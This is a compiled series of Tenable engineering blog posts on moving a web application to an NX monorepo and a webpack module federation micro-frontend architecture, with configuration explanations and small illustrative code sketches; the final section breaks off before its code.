As our application continued to grow, we created more teams to manage individual parts of the application. While this was beneficial in the sense that we were able to work at a quicker pace, it also led to a variety of issues.

Component Isolation

Due to global components living in their own repository, we began encountering an issue where components did not always work appropriately when they were integrated into the actual application. While developing a component in isolation is nice from a developmental standpoint, the reality is that the needs of an application are diverse, and typically this means that a component must be flexible enough to account for these needs. As a result, it becomes extremely difficult to determine if a component is going to work appropriately until you actually try to leverage it in your application.

Solution #1 — Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.

Component Bugs & Breaking Changes

We also encountered a scenario where a bug was introduced in a given component but was not found or realized until a later date. Since component updates were made in isolation within another repository, engineers working on the Tenable.io application would only pull in updated components when necessary. When they did, they were typically jumping across multiple versions at once (e.g., 1.0.0 to 1.4.5). When the team discovered a bug, it may have been introduced by one of the versions in between (e.g., 1.2.2). Trying to backtrack and identify which particular version introduced the bug was a time-consuming process.
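To give a sense of what that backtracking involves, here is a minimal sketch of a binary search over published versions. It assumes the bug persists in every version after the one that introduced it, and the is_buggy callback is hypothetical: in practice it would mean installing that version and running a reproduction by hand or with a test.

```python
def first_bad_version(versions, is_buggy):
    """Binary search for the earliest version where is_buggy(version) is True.

    versions: ordered oldest to newest; the first is assumed good, the last bad.
    is_buggy: hypothetical callback that checks one version for the bug.
    """
    good, bad = 0, len(versions) - 1  # versions[good] works, versions[bad] does not
    while bad - good > 1:
        middle = (good + bad) // 2
        if is_buggy(versions[middle]):
            bad = middle
        else:
            good = middle
    return versions[bad]
```

Even with the search halving the range each time, every step is a full install-and-verify cycle, which is why jumping across many versions at once made these bugs expensive to track down.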

Solution #2 — Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.

One Team Blocks All Others

One of the most significant issues we faced from an architectural perspective was the blocking nature of our deployments. Even though a large number of teams worked on different areas of the application that were relatively isolated, if just one team introduced a breaking change it blocked all the other teams.

Solution #3 — Feature teams should move at their own pace, and their impact on one another should be limited as much as possible.

Slow Development

As we added more teams and more features to Tenable.io, the size of our application continued to grow, as demonstrated below.

If you’ve ever been the one responsible for managing the webpack build of your application, you’ll know that the bigger your application gets, the slower your build becomes. This is simply a result of having more code that must be compiled/re-compiled as engineers develop features. This not only impacted local development: our Jenkins build was also getting slower as things grew, because it had to lint, test, and build more and more code. We employed a number of solutions in an attempt to speed up our build, including the DllPlugin, the SplitChunksPlugin, and tweaks to our minification configuration, among others. However, we began realizing that at a certain point there wasn’t much more we could do and we needed a better way to build out the different parts of the application (note: something like parallel-webpack could have helped here if we had gone down a different path).

Solution #4 — Engineers should be capable of building the application quickly for development purposes regardless of the size of the application as it grows over time. In addition, Jenkins should be capable of testing, linting, and building the application in a performant manner as the system grows.

The Solution

At a certain point, we decided that our architecture was not satisfying our needs. As a result, we made the decision to update it. Specifically, we believed that moving towards a monorepo based on a micro-frontend architecture would help us address these needs by offering the following benefits:

  • Monorepo — While definitions vary, in our case a monorepo is a single repository that houses multiple applications. Moving to a monorepo would entail consolidating the Design System and the Tenable.io repositories into one. By combining them into one repository, we can ensure that updates made to components are tested in real time by the code consuming them and that the components themselves are truly satisfying the needs of our engineers.
  • Micro-Frontend — As defined here, a “Micro-frontend architecture is a design approach in which a front-end app is decomposed into individual, semi-independent ‘microapps’ working loosely together.” For us, this means splitting apart the Tenable.io application into multiple micro-applications (we’ll use this term moving forward). Doing this allows teams to move at their own pace and limit their impact on one another. It also speeds up the time to build the application locally by allowing engineers to choose which micro applications to build and run.

Summary

With these things in mind, we began to develop a series of architectural diagrams and roadmaps that would enable us to move from point A to point B. Keep in mind, though, at this point we were dealing with an enterprise application that was in active development and in use by customers. For anyone who has ever been through this process, trying to revamp your architecture at this stage is somewhat akin to changing a tyre while driving.

As a result, we had to ensure that as we moved towards this new architecture, our impact on the normal development and deployment of the application was minimal. While there were plenty of bumps and bruises along the way, which we will share as we go, we were able to accomplish this through a series of phases. In the following articles, we will walk through these phases. See the next article to learn how we moved to a monorepo leveraging the NX framework.


2. Why We Implemented A Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

3. Introducing The Monorepo & NX

Introducing The Monorepo & NX

This is post 3 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

In this next phase of our journey, we created a monorepo built off the NX framework. The focus of this article is on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion. As discussed in the previous article, our teams were plagued by a series of issues that we believed could be solved by moving towards a new architecture. Before we dive into the first phase of this new architecture, let’s recap one of the issues we were facing and how we solved it during this first phase.

The Problem

Our global components lived in an entirely different repository, where they had to be published and pulled down through a versioning system. To do this, we leveraged Lerna and Nexus, which is similar to how third-party npm packages are deployed and utilized. As a result of this model, we constantly dealt with issues pertaining to component isolation and breaking changes.

To address these issues, we wanted to consolidate the Design System and Tenable.io repositories into one. To ensure our monorepo would be fast and efficient, we also introduced the NX framework to only rebuild parts of the system that were impacted by a change.

The Solution

The Monorepo Is Born

The first step in updating our architecture was to bring the Design System into the Tenable.io repository. This involved the following:

  • Design System components — The components themselves were broken apart into a series of subdirectories that all lived under libs/design-system. In this way, they could live alongside our other Tenable.io specific libraries.
  • Design System website — The website (responsible for documenting the components) was moved to live alongside the Tenable.io application in a directory called apps/design-system.

The following diagram shows how we created the new monorepo based on these changes.

It’s important to note that at this point, we made a clear distinction between applications and libraries. This distinction is important because we wanted to ensure a clear import order: that is, we wanted applications to be able to consume libraries but never the other way around.
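The import-order rule can be expressed as a simple check over the import graph. The sketch below is only an illustration of the rule, not something NX provides in this form: the project names mirror the directories described in this article, and the PROJECT_TYPES table and import_violations helper are hypothetical.

```python
# Hypothetical classification of each project as an application or a library.
PROJECT_TYPES = {
    "design-system": "app",
    "tenable-io": "app",
    "design-system/components": "lib",
    "design-system/styles": "lib",
    "tenable-io/common": "lib",
}


def import_violations(imports, project_types=PROJECT_TYPES):
    """Return (importer, imported) pairs where a library imports an application.

    imports: iterable of (importer, imported) project-name pairs.
    """
    return [
        (importer, imported)
        for importer, imported in imports
        if project_types[importer] == "lib" and project_types[imported] == "app"
    ]
```

An application importing a library passes the check, while a library such as tenable-io/common importing the tenable-io application would be reported as a violation.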

Leveraging NX

In addition to moving the design system, we also wanted the ability to only rebuild applications and libraries based on what was changed. In a monorepo where you may end up having a large number of applications and libraries, this type of functionality is critical to ensure your system doesn’t grow slower over time.

Let’s use an example to demonstrate the intended functionality: In our example, we have a component that is initially only imported by the Design System site. If an engineer changes that component, then we only want to rebuild the Design System because that’s the only place that was impacted by the change. However, if Tenable.io was leveraging that component as well, then both applications would need to be rebuilt. To manage this complexity, we rebuilt the repository using NX.

So what is NX? NX is a set of tools that enables you to separate your libraries and applications into what NX calls “workspaces”. Think of a workspace as an area in your repository (i.e. a directory) that houses shared code (an application, a utility library, a component library, etc.). Each workspace has a series of commands that can be run against it (build, serve, lint, test, etc.). This way when a workspace is changed, the nx affected command can be run to identify any other workspace that is impacted by the update. As demonstrated here, when we change Component A (living in the design-system/components workspace) and run the affected command, NX indicates that the following three workspaces are impacted by that change: design-system/components, Tenable.io, and Design System. This means that both the Tenable.io and Design System applications are importing that component.
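Conceptually, working out what is affected means walking the import graph backwards from whatever changed. The sketch below illustrates that idea in Python. It is not how NX is implemented, and the DEPENDS_ON graph is a hypothetical stand-in built from the workspace names used in this article.

```python
from collections import deque

# Hypothetical import graph: each project maps to the projects it imports.
DEPENDS_ON = {
    "design-system": ["design-system/components"],
    "tenable-io": ["design-system/components", "tenable-io/common"],
    "design-system/components": [],
    "tenable-io/common": [],
}


def affected(changed, depends_on=DEPENDS_ON):
    """Return the changed projects plus everything that imports them, transitively."""
    # Invert the graph so each project points at the projects that import it
    dependents = {name: [] for name in depends_on}
    for project, dependencies in depends_on.items():
        for dependency in dependencies:
            dependents[dependency].append(project)

    # Breadth-first walk outward from the changed projects
    seen = set(changed)
    queue = deque(changed)
    while queue:
        current = queue.popleft()
        for importer in dependents[current]:
            if importer not in seen:
                seen.add(importer)
                queue.append(importer)
    return sorted(seen)
```

With this graph, a change to design-system/components reaches both applications, whereas a change to tenable-io/common only reaches tenable-io, so the Design System site would not need to be rebuilt.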

This type of functionality is critical for a monorepo to work as it scales in size. Without this your automation server (Jenkins in our case) would grow slower over time because it would have to rebuild, re-lint, and re-test everything whenever a change was made. If you want to learn more about how NX works, please take a look at this write up that explains some of the above concepts in more detail.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how NX works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.

At this point, our repository looks something like the structure of defined workspaces below:

Apps

  • design-system — The static site (built off of Gatsby) that documents our global components.
  • tenable-io — Our core application that was already in the repository.

Libs

  • design-system/components — A library that houses our global components.
  • design-system/styles — A library that is responsible for setting up our global theme provider.
  • tenable-io/common — The pre-existing shared code that the Tenable.io application was leveraging and sharing throughout the application.

To reiterate, a workspace is simply a directory in your repository that houses shared code that you want to treat as either an application or a library. The difference here is that an application is standalone in nature and shows what your consumers see, whereas a library is something that is leveraged by one or more applications (your shared code). As shown below, each workspace can be configured with a series of targets (build, serve, lint, test) that can be run against it. This way if a change has been made that impacts the workspace and we want to build all of them, we can tell NX to run the build target (line 6) for all affected workspaces.

At this point, our two demo applications resemble the screenshots below. As you can see, there are three library components in use. These are the black, gray, and blue colored blocks on the page. Two of these come from the design-system/components workspace (Test Component 1 & 2), and the other comes from tenable-io/common (Tenable.io Component). These components will be used to demonstrate how applications and libraries are leveraged and relate to one another in the NX framework.

The Power Of NX

Now that you know what our demo application looks like, it’s time to demonstrate the importance of NX. Before we make any updates, we want to showcase the dependency graph that NX uses when analyzing our repository. By running the command nx dep-graph, the following diagram appears and indicates how our various workspaces are related. A relationship is established when one app/lib imports from another.

We now want to demonstrate the true power and purpose of NX. We start by running the nx affected:apps and nx affected:libs commands with no active changes in our repository. As shown below, no apps or libs are returned by either of these commands. This indicates that there are no changes currently in our repository, and, as a result, nothing has been affected.

Now we will make a slight update to our test-component-1.tsx file (line 19):

If we re-run the affected commands above we see that the following apps/lib are impacted: design-system, tenable-io, and design-system/components:

Additionally, if we run nx affected:dep-graph we see the following diagram. NX is showing us the above command in visual form, which can be helpful in understanding why the change you made impacted a given application or library.

With all of this in place, we can now accomplish a great deal. For instance, a common scenario (and one of our initial goals from the previous article) is to run tests for just the workspaces actually impacted by a code change. If we change a global component, we want to run all the unit tests that may have been impacted by that change. This way, we can ensure that our update is truly backwards compatible (which gets harder and harder as a component is used in more locations). We can accomplish this by running the test target on the affected workspaces:

Summary

Now you are familiar with how we set up our monorepo and incorporated the NX framework. By doing this, we were able to accomplish two of the goals we started with:

  1. Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.
  2. Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.

Once we successfully set up our monorepo and incorporated the NX framework, our next step was to break apart the Tenable.io application into a series of micro applications that could be built and deployed independently. See the next article in the series to learn how we did this and the lessons we learned along the way.


3. Introducing The Monorepo & NX was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

4. Introducing Module Federation

Introducing Module Federation

This is post 4 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

As discussed in the previous article, the first step in updating our architecture involved the consolidation of our two repositories into one and the introduction of the NX framework. Once this phase was complete, we were ready to move to the next phase: the introduction of module federation for the purposes of breaking our Tenable.io application into a series of micro-apps.

The Problem

Before we dive into what module federation is and why we used it, it’s important to first understand the problem we wanted to solve. As demonstrated in the following diagram, multiple teams were responsible for individual parts of the Tenable.io application. However, regardless of the update, everything went through the same build and deployment pipeline once the code was merged to master. This created a natural bottleneck where each team was reliant on any change made previously by another team.

This was problematic for a number of reasons:

  • Bugs — Imagine your team needs to deploy an update to customers for your particular application as quickly as possible. However, another team introduced a relatively significant bug that should not be deployed to production. In this scenario, you either have to wait for the other team to fix the bug or release the code to production while knowingly introducing the bug. Neither of these is a good option.
  • Slow to lint, test and build — As discussed previously, as an application grows in size, things such as linting, testing, and building inevitably get slower as there is simply more code to deal with. This has a direct impact on your automation server/delivery pipeline (in our case Jenkins) because the pipeline will most likely get slower as your codebase grows.
  • E2E Testing Bottleneck — End-to-end tests are an important part of an enterprise application to ensure bugs are caught before they make their way to production. However, running E2E tests for your entire application can cause a massive bottleneck in your pipeline as each build must wait on the previous build to finish before proceeding. Additionally, if one team’s E2E tests fail, it blocks the other team’s changes from making it to production. This was a significant bottleneck for us.

The Solution

Let’s discuss why module federation was the solution for us. First, what exactly is module federation? In a nutshell, it is webpack’s way of implementing a micro-frontend (though it’s not limited to only implementing frontend systems). More specifically, it enables us to break apart our application into a series of smaller applications that can be developed and deployed individually, and then put back together into a single application. Let’s analyze how our deployment model above changes with this new approach.

As shown below, multiple teams were still responsible for individual parts of the Tenable.io application. However, you can see that each individual application within Tenable.io (the micro-apps) has its own Jenkins pipeline where it can lint, test, and build the code related to that individual application. But how do we know which micro-app was impacted by a given change? We rely on the NX framework discussed in the previous article. As a result of this new model, the bottleneck shown above is no longer an issue.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how module federation works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.

Diagrams are great, but what does a system like this actually look like from a code perspective? We will build off the demo from the previous article to introduce module federation for the Tenable.io application.

Workspaces

One of the very first changes we made was to our NX workspaces. New workspaces are created via the npx create-nx-workspace command. For our purposes, the intent was to split up the Tenable.io application (previously its own workspace) into three individual micro-apps:

  • Host — Think of this as the wrapper for the other micro-apps. Its primary purpose is to load in the micro-apps.
  • Application 1 — Previously, this was apps/tenable-io/src/app/app-1.tsx. We are now going to transform this into its own individual micro-app.
  • Application 2 — Previously, this was apps/tenable-io/src/app/app-2.tsx. We are now going to transform this into its own individual micro-app.

This simple diagram illustrates the relationship between the Host and micro-apps:

Let’s analyze a before and after of our workspace.json file that shows how the tenable-io workspace (line 5) was split into three (lines 4–6).

Before (line 5)

After (lines 4–6)

Note: When leveraging module federation, there are a number of different architectures you can leverage. In our case, a host application that loaded in the other micro-apps made the most sense for us. However, you should evaluate your needs and choose the one that’s best for you. This article does a good job in breaking these options down.

Workspace Commands

Now that we have these three new workspaces, how exactly do we run them locally? If you look at the previous demo, you’ll see our serve command for the Tenable.io application leveraged the @nrwl/web:dev-server executor. Since we’re going to be creating a series of highly customized webpack configurations, we instead opted to leverage the @nrwl/workspace:run-commands executor. This allowed us to simply pass a series of terminal commands that get run. For this initial setup, we’re going to leverage a very simple approach to building and serving the three applications. As shown in the commands below, we simply change directories into each of these applications (via cd apps/…), and run the npm run dev command that is defined in each micro-app’s package.json file. This command starts the webpack dev server for each application.

The serve target for host — Kicks off the dev servers for all 3 apps
Dev command for host — Applications 1 & 2 are identical

At this point, if we run nx serve host (serve being one of the targets defined for the host workspace) it will kick off the three commands shown on lines 10–12. Later in the article, we will show a better way of managing multiple webpack configurations across your repository.
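As a rough sketch of the serve target described above, the configuration can be written as a plain JavaScript object. The executor name and the cd/npm run dev commands come from the text; the directory names under apps/ and the parallel option are assumptions made for illustration.

```javascript
// Sketch of the `serve` target for the host project in workspace.json,
// written as a JavaScript object so it can be inspected and tested.
// Assumption: the three apps live in apps/host, apps/application-1 and
// apps/application-2 (directory names are illustrative).
const appDirectories = ['host', 'application-1', 'application-2'];

const serveTarget = {
  executor: '@nrwl/workspace:run-commands',
  options: {
    // One terminal command per micro-app: change into the app and start
    // the webpack dev server through its own package.json script.
    commands: appDirectories.map((dir) => `cd apps/${dir} && npm run dev`),
    // Assumption: the dev servers run side by side, because each of
    // them keeps running until it is stopped.
    parallel: true,
  },
};

console.log(JSON.stringify(serveTarget, null, 2));
```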

Webpack Configuration — Host

The following configuration shows a pretty bare bones implementation for our Host application. We have explained the various areas of the configuration and their purpose. If you are new to webpack, we recommend you read through their getting started documentation to better understand how webpack works.

Some items of note include:

  • ModuleFederationPlugin — This is what enables module federation. We’ll discuss some of the sub properties below.
  • remotes — This is the primary difference between the host application and the applications it loads in (application 1 and 2). We define application1 and application2 here. This tells our host application that there are two remotes that exist and that can be loaded in.
  • shared — One of the concepts you’ll need to get used to in module federation is the concept of sharing resources. Without this configuration, webpack will not share any code between the various micro-applications. This means that if application1 and application2 both import react, they each will use their own versions. Certain libraries (like the ones defined here) only allow you to load one version of the library for your application. This can cause your application to break if the library gets loaded in more than once. Therefore, we ensure these libraries are shared and only one version gets loaded in.
  • devServer — Each of our applications has this configured, and it serves each of them on their own unique port. Note the addition of the Access-Control-Allow-Origin header: this is critical for dev mode to ensure the host application can access other ports that are running our micro-applications.
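The items above can be sketched as two plain objects. This is a minimal illustration rather than the original configuration: the shared library names are placeholders, and in a real webpack.config.js the first object would be passed to new ModuleFederationPlugin(...) from require('webpack').container.

```javascript
// Sketch of the host-specific pieces of the webpack configuration.
// Port 3000 for the host matches the port mentioned later in this series.
const HOST_PORT = 3000;

const hostFederationOptions = {
  name: 'host',
  // The host declares which remotes exist and can be loaded in. A plain
  // name refers to a global variable that the remote entry file creates.
  remotes: {
    application1: 'application1',
    application2: 'application2',
  },
  // Libraries that must only be loaded once are shared as singletons.
  // Assumption: react and react-dom stand in for the libraries in the
  // original configuration.
  shared: {
    react: { singleton: true },
    'react-dom': { singleton: true },
  },
};

const hostDevServer = {
  port: HOST_PORT,
  // Every app sets this header so that a page served from another port
  // is allowed to fetch its files during development.
  headers: { 'Access-Control-Allow-Origin': '*' },
};

console.log(Object.keys(hostFederationOptions.remotes));
```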

Webpack Configuration — Application

The configurations for application1 and application2 are nearly identical to the one above, with the exception of the ModuleFederationPlugin. Our applications are responsible for determining what they want to expose to the outside world. In our case, the exposes property of the ModuleFederationPlugin defines what is exposed to the Host application when it goes to import from either of these. This is the exposes property’s purpose: it defines a public API that determines which files are consumable. So in our case, we will only expose the index file (‘.’) in the src directory. You’ll see we’re not defining any remotes, and this is intentional. In our setup, we want to prevent micro-applications from importing resources from each other; if they need to share code, it should come from the libs directory.

In this demo, we’re keeping things as simple as possible. However, you can expose as much or as little as you want based on your needs. So if, for example, we wanted to expose an individual component, we could do that using the following syntax:
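A minimal sketch of the exposes property follows, assuming a micro-app named application1. The extra './TestComponent' key and its file path are hypothetical; the small helper only illustrates how an exposes key relates to the specifier the Host would import it by.

```javascript
// Sketch of what differs in a micro-app's ModuleFederationPlugin options.
const application1FederationOptions = {
  name: 'application1',
  // The generated file that a host loads to reach this micro-app.
  filename: 'remoteEntry.js',
  // Public API: only the index file in src is consumable from outside.
  exposes: {
    '.': './src/index',
  },
  // No `remotes` on purpose: micro-apps do not import from each other.
};

// Exposing one more component next to the index file.
// Assumption: the key and the file path are hypothetical examples.
const granularExposes = {
  ...application1FederationOptions.exposes,
  './TestComponent': './src/app/test-component',
};

// Maps an exposes key to the specifier a host would import it by.
function importSpecifier(remoteName, exposeKey) {
  return exposeKey === '.'
    ? remoteName
    : `${remoteName}/${exposeKey.replace(/^\.\//, '')}`;
}

const specifiers = Object.keys(granularExposes).map((key) =>
  importSpecifier('application1', key)
);
console.log(specifiers); // [ 'application1', 'application1/TestComponent' ]
```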

Initial Load

When we run nx serve host, what happens? The entry point for our host application is the index.js file shown below. This file imports another file called bootstrap.js. This approach avoids the error “Shared module is not available for eager consumption,” which you can read more about here.

The bootstrap.js file is the real entry point for our Host application. We are able to import Application1 and Application2 and load them in like a normal component (lines 15–16):

Note: Had we exposed more specific files as discussed above, our import would be more granular in nature:

At this point, you might think we’re done. However, if you ran the application you would get the following error message, which tells us that the import on line 15 above isn’t working:

Loading The Remotes

To understand why this is, let’s take a look at what happens when we build application1 via the webpack-dev-server command. When this command runs, it actually serves this particular application on port 3001, and the entry point of the application is a file called remoteEntry.js. If we actually go to that port/file, we’ll see something that looks like this:

In the module federation world, application 1 & 2 are called remotes. According to their documentation, “Remote modules are modules that are not part of the current build and loaded from a so-called container at the runtime”. This is how module federation works under the hood, and is the means by which the Host can load in and interact with the micro-apps. Think of the remote entry file shown above as the public interface for Application1, and when another application loads in the remoteEntry file (in our case Host), it can now interact with Application1.

We know application 1 and 2 are getting built, and they’re being served up at ports 3001 and 3002. So why can’t the Host find them? The issue is that we haven’t actually done anything to load in those remote entry files. To make that happen, we have to open up the public/index.html file and add those remote entry files in:

Our host specifies the index.html file
The index.html file is responsible for loading in the remote entries
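To make the static approach concrete, here is a small sketch that produces the script tags the index.html file would need. The ports come from the text; the localhost URLs and the helper name are assumptions for a local dev setup.

```javascript
// Builds one <script> tag per remote entry file. In the static approach
// these tags are written directly into public/index.html.
function remoteEntryScriptTags(remotePorts) {
  return Object.values(remotePorts)
    .map((port) => `<script src="http://localhost:${port}/remoteEntry.js"></script>`)
    .join('\n');
}

const tags = remoteEntryScriptTags({ application1: 3001, application2: 3002 });
console.log(tags);
```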

Now if we run the host application and investigate the network traffic, we’ll see the remoteEntry.js file for both application 1 and 2 get loaded in via ports 3001 and 3002:

Summary

At this point, we have covered a basic module federation setup. In the demo above, we have a Host application that is the main entry point for our application. It is responsible for loading in the other micro-apps (application 1 and 2). As we implemented this solution for our own application we learned a number of things along the way that would have been helpful to know from the beginning. See the following articles to learn more about the intricacies of using module federation:


4. Introducing Module Federation was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

5. Module Federation — Managing Your Micro-Apps

Module Federation — Managing Your Micro-Apps

This is post 5 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

The Problem

When you first start using module federation and only have one or two micro-apps, managing the configurations for each app and the various ports they run on is simple.

As you progress and continue to add more micro-apps, you may start running into issues with managing all of these micro-apps. You will find yourself repeating the same configuration over and over again. You’ll also find that the Host application needs to know which micro-app is running on which port, and you’ll need to avoid serving a micro-app on a port already in use.

The Solution

To reduce the complexity of managing these various micro-apps, we consolidated our configurations and the serve command (to spin up the micro-apps) into a central location within a newly created tools directory:

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how we dealt with managing an ever growing number of micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

The Serve Command

One of the most important things we did here was create a serve.js file that allowed us to build/serve only those micro-apps an engineer needed to work on. This increased the speed at which our engineers got the application running, while also consuming as little local memory as possible. Below is a general breakdown of what that file does:

You can see in our webpack configuration below where we send the ready message (line 193). The serve command above listens for that message (line 26 above) and uses it to keep track of when a particular micro-app is done compiling.
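The ready-message handshake can be sketched roughly as follows. This is not the original serve.js: it assumes each dev server runs as a Node child process started with child_process.fork, that the child calls process.send('ready') when compilation finishes, and that the parent forwards messages to the tracker via child.on('message', ...).

```javascript
// Tracks which micro-apps have reported that they finished compiling.
// `onAllReady` is called once, when the last pending app reports in.
function createReadyTracker(appNames, onAllReady) {
  const pending = new Set(appNames);
  return function handleMessage(appName, message) {
    // Ignore unrelated messages and repeated "ready" messages (a dev
    // server may recompile and report again).
    if (message !== 'ready' || !pending.has(appName)) return;
    pending.delete(appName);
    if (pending.size === 0) onAllReady();
  };
}

// Assumed wiring in the parent process, one listener per forked child:
//   child.on('message', (message) => handleMessage(appName, message));
let allReady = false;
const handleMessage = createReadyTracker(['host', 'application-1'], () => {
  allReady = true;
});

handleMessage('host', 'ready');
handleMessage('application-1', 'ready');
console.log(allReady); // true
```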

Remote Utilities

Additionally, we created some remote utilities that allowed us to consistently manage our remotes. Specifically, they return the name of each remote along with the port it should run on. As you can see below, this logic is based on the workspace.json file. This was done so that if a new micro-app was added it would be automatically picked up without any additional configuration by the engineer.
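One way such a utility could look is sketched below. The rule used here (every project under apps/ except the Host is a remote, with ports handed out in order starting at 3001) is an assumption for illustration, as are the function and option names.

```javascript
// Derives the list of remotes and their ports from workspace.json content.
// Assumptions: each project entry is an object with a `root` path, apps
// live under apps/, and ports are assigned in project order from 3001.
function getRemotes(workspace, { hostName = 'host', firstPort = 3001 } = {}) {
  return Object.entries(workspace.projects)
    .filter(([name, project]) => project.root.startsWith('apps/') && name !== hostName)
    .map(([name], index) => ({ name, port: firstPort + index }));
}

const sampleWorkspace = {
  projects: {
    host: { root: 'apps/host' },
    'application-1': { root: 'apps/application-1' },
    'application-2': { root: 'apps/application-2' },
    'design-system-components': { root: 'libs/design-system/components' },
  },
};

const remotes = getRemotes(sampleWorkspace);
console.log(remotes);
```

Because the list is derived from the project definitions, adding a new project under apps/ would make it show up here without touching the utility.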

Putting It All Together

Why was all this necessary? One of the powerful features of module federation is that all micro-apps are capable of being built independently. This was the purpose of the serve script shown above, i.e. it enabled us to spin up a series of micro-apps based on our needs. For example, with this logic in place, we could accommodate a host of various engineering needs:

  • Host only — If we wanted to spin up the Host application we could run npm run serve (the command defaults to spinning up Host).
  • Host & Application1 — If we wanted to spin up both Host and Application1, we could run npm run serve --apps=application-1.
  • Application2 Only — If we already had the Host and Application1 running, and we now wanted to spin up Application2 without having to rebuild things, we could run npm run serve --apps=application-2 --appOnly.
  • All — If we wanted to spin up everything, we could run npm run serve --all.
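The four scenarios above can be sketched as a small resolver. How the flags actually reach the script depends on how npm is invoked, so this sketch simply takes a list of flag strings; the comma-separated --apps format and the function names are assumptions.

```javascript
// Parses the flags used in the scenarios above.
function parseServeArgs(argv) {
  const options = { apps: [], appOnly: false, all: false };
  for (const arg of argv) {
    if (arg === '--all') options.all = true;
    else if (arg === '--appOnly') options.appOnly = true;
    else if (arg.startsWith('--apps=')) {
      // Assumption: several apps can be passed as a comma-separated list.
      options.apps = arg.slice('--apps='.length).split(',').filter(Boolean);
    }
  }
  return options;
}

// Decides which applications to spin up for a given set of flags.
function resolveAppsToServe(argv, allRemotes, hostName = 'host') {
  const { apps, appOnly, all } = parseServeArgs(argv);
  if (all) return [hostName, ...allRemotes];
  const unknown = apps.filter((app) => !allRemotes.includes(app));
  if (unknown.length > 0) {
    throw new Error(`Unknown micro-app(s): ${unknown.join(', ')}`);
  }
  // With --appOnly the Host is assumed to be running already.
  return appOnly ? apps : [hostName, ...apps];
}

const knownRemotes = ['application-1', 'application-2'];
console.log(resolveAppsToServe([], knownRemotes)); // [ 'host' ]
console.log(resolveAppsToServe(['--apps=application-2', '--appOnly'], knownRemotes)); // [ 'application-2' ]
```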

You can easily imagine that as your application grows and your codebase gets larger and larger, this type of functionality can be extremely powerful since you only have to build the parts of the application related to what you’re working on. This allowed us to speed up our boot time by 2x and our rebuild time by 7x, which was a significant improvement.

Note: If you use Visual Studio Code, you can accomplish some of this same functionality through the NX Console extension.

Loading Your Micro-Apps — The Static Approach

In the previous article, when it came to importing and using Application 1 and 2, we simply imported the micro-apps at the top of the bootstrap file and hard coded the remote entries in the index.html file:

Application 1 & 2 are imported at the top of the file, which means they have to be loaded right away
The moment our app loads, it has to load in the remote entry files for each micro-app

However, in the real world, this is not the best approach. By taking this approach, the moment your application runs, it is forced to load in the remote entry files for every single micro-app. For a real world application that has many micro-apps, this means the performance of your initial load will most likely be impacted. Additionally, loading in all the micro-apps as we’re doing in the index.html file above is not very flexible. Imagine some of your micro-apps are behind feature flags that only certain customers can access. In this case, it would be much better if the micro-apps could be loaded in dynamically only when a particular route is hit.

In our initial approach with this new architecture, we made this mistake and paid for it from a performance perspective. We noticed that as we added more micro-apps, our initial load was getting slower. We finally discovered the issue was related to the fact that we were loading in our remotes using this static approach.

Loading Your Micro-Apps — The Dynamic Approach

Leveraging the remote utilities we discussed above, you can see how we pass the remotes and their associated ports in the webpack build via the REMOTE_INFO property. This global property will be accessed later on in our code when it’s time to load the micro-apps dynamically.
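A sketch of how a REMOTE_INFO global could be produced at build time follows. It assumes webpack's DefinePlugin is the mechanism (the text does not name it) and that the remote list has the name/port shape used here.

```javascript
// Builds the definitions object for webpack's DefinePlugin.
// DefinePlugin replaces the identifier with the given code fragment at
// build time, so the value must be a string of source code: hence the
// JSON.stringify.
function buildRemoteInfoDefinitions(remotes) {
  return { REMOTE_INFO: JSON.stringify(remotes) };
}

// Assumed shape of the remote list (names and ports are illustrative).
const remoteList = [
  { name: 'application1', port: 3001 },
  { name: 'application2', port: 3002 },
];

const definitions = buildRemoteInfoDefinitions(remoteList);
// In webpack.config.js: plugins: [new webpack.DefinePlugin(definitions)]
console.log(definitions.REMOTE_INFO);
```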

Once we had the necessary information we needed for the remotes (via the REMOTE_INFO variable), we then updated our bootstrap.jsx file to leverage a new component we discuss below called <MicroApp />. The purpose of this component was to dynamically attach the remote entry to the page and then initialize the micro-app lazily so it could be leveraged by Host. You can see the actual component never gets loaded until we hit a path where it is needed. This ensures that a given micro-app is never loaded in until it’s actually needed, leading to a huge boost in performance.

The actual logic of the <MicroApp /> component is highlighted below. This approach is a variation of the example shown here. In a nutshell, this logic dynamically injects the <script src="…remoteEntry.js"></script> tag into the index.html file when needed, and initializes the remote. Once initialized, the remote and any exposed component can be imported by the Host application like any other import.
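The loading logic can be sketched without React as two small functions. This is a sketch in the spirit of webpack's dynamic remote container pattern, not the original component. The document, the global object, and the webpack sharing helpers are passed in as parameters so the code can run outside a browser; in a webpack build, initSharing and shareScopes would be the runtime-provided __webpack_init_sharing__ and __webpack_share_scopes__, and the parameter names here are assumptions.

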